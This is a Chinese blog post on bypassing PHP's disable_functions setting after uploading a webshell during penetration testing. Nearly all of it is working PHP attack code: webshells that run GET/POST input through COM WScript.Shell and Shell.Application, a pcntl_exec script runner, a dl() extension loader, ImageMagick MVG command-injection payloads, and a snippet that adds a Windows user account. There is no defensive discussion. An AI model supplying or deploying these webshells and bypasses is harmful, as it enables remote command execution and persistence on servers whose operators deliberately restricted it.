···

···

关注
发信
关注(28)粉丝(399)

PHP函数禁用绕过

在渗透测试过程中可能经常会遇到上传webshell后,由于php.ini配置禁用了一些如exec(),shell_exec(),system()等执行系统命令的函数,导致无法执行系统命令,就此问题给出几种绕过方法。

话不多说,直接贴代码:
···math
<?php
$phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!");
$exec=$phpwsh->exec("cmd.exe /c ".$_GET['c']."");
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
<?php
···
···
header("Content-Type: text/plain");

$cmd="/tmp/exec";
@unlink($cmd);
$c = "#!/usr/bin/env bash\n".$_GET[x]."> /tmp/output.txt\n";
file_put_contents($cmd, $c);
chmod($cmd, 0777);
$cd="/tmp/output.txt";
print_r(file_get_contents($cd));

switch (pcntl_fork()) {

case 0:

$ret = pcntl_exec($cmd);

exit("case 0");

default:

echo "case 1";

break;

}
···
···
<?php
$phpwsh=new COM("Shell.Application") or die("Create Wscript.Shell Failed!");
$exec=$phpwsh->ShellExecute("net"," user test test /add");
//$exec=$phpwsh->ShellExecute("cmd","/c net user test test /add");
?>
···
···
<?php
$phpwsh=new COM("Shell.Application") or die("Create Wscript.Shell Failed!");
$exec=$phpwsh->open("c:\windows\system32\cmd.exe");
?>
···
···
<?php
$a=new COM("Shell.Application");
$a->NameSpace("C:\Windows\System32")->Items()->item("cmd.exe")->invokeverb();
?>
···
···
<?php
$a=new COM("Shell.Application");
$a->NameSpace("C:\Windows\System32")->Items()->item("cmd.exe")->invokeverbEx();
?>
···
···
<?php
$command=$_POST[a];
$wsh = new COM('WScript.shell'); // 生成一个COM对象
$exec = $wsh->exec('cmd.exe /c '.$command); //调用对象方法来执行命令
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput
?>
···
···
<?php
dl("dl.so"); //dl.so在extension_dir目录,如不在则用../../来实现调用
confirm_dl_compiled("$_GET[a]>1.txt");
?>
···
···
<?php
echo "Disable Functions: " . ini_get('disable_functions') . "\n";

$command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
if ($command == '') {
$command = 'id';
}

$exploit = <<<EOF
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|$command")'
pop graphic-context
EOF;

file_put_contents("KKKK.mvg", $exploit);
$thumb = new Imagick();
$thumb->readImage('KKKK.mvg');
$thumb->writeImage('KKKK.png');
$thumb->clear();
$thumb->destroy();
unlink("KKKK.mvg");
unlink("KKKK.png");
?>
···
···
<?php
$c=$_REQUEST['c'];
$e = <<<EOF
push graphic-context
viewbox 0 0 640 480
fill 'url(https://"|$c")'
pop graphic-context
EOF;
$i = new Imagick();
$i->readImageBlob($e);
?>
···

12-28 00:13
Powered by LMLPHP ©2024 ··· 0.064656